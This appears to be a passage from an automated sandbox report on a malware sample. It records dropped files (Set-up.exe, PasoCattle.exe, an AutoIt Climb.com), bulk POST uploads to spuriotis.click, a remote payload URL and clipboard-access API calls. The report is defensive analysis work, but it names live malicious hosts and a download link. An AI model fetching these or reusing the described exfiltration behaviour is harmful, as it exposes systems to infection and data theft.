Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FL5CLJC2ZZYV0FNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20547Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PGRU0P1V1YYIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LZT6ZN09IOYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 573710Host: spuriotis.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0056D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

14_2_0056D889

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top
Source: global traffic	DNS traffic detected: DNS query: spuriotis.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:29:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 28 Dec 2024 08:29:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=06
Source: Set-up.exe, 00000003.00000002.2499326538.0000000001129000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: Set-up.exe, 00000003.00000003.2496527843.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496126173.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2496722730.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2497124911.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2495746177.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2498542367.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse=I
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000002.00000002.2236150044.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000002.00000000.2217096288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000077B9000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Climb.com, 0000000E.00000000.2308290688.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Climb.com, 0000000E.00000003.2561026066.00000000045D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.0000000007674000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2499350119.000000000112B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://razaseoexpertinbd.com/Assaac.exe
Source: CLaYpUL3zw.exe, 00000000.00000002.2262600590.00000000068F5000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296354162.0000000004585000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/api
Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/apiK
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/piVL
Source: Climb.com, 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/uo
Source: Climb.com, 0000000E.00000002.3470088384.0000000001A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click/xD
Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/api
Source: Climb.com, 0000000E.00000002.3470289773.0000000001B6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spuriotis.click:443/apil
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Climb.com, 0000000E.00000003.2460332709.00000000049B2000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Fingers.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Climb.com, 0000000E.00000003.2562514257.00000000045B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fingers.11.dr, PasoCattle.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Climb.com, 0000000E.00000003.2511667371.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2511823131.00000000045A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Climb.com, 0000000E.00000003.2562004892.0000000005E2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.5:49830 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0056F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

14_2_0056F7C7

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_0056F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

14_2_0056F55C

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

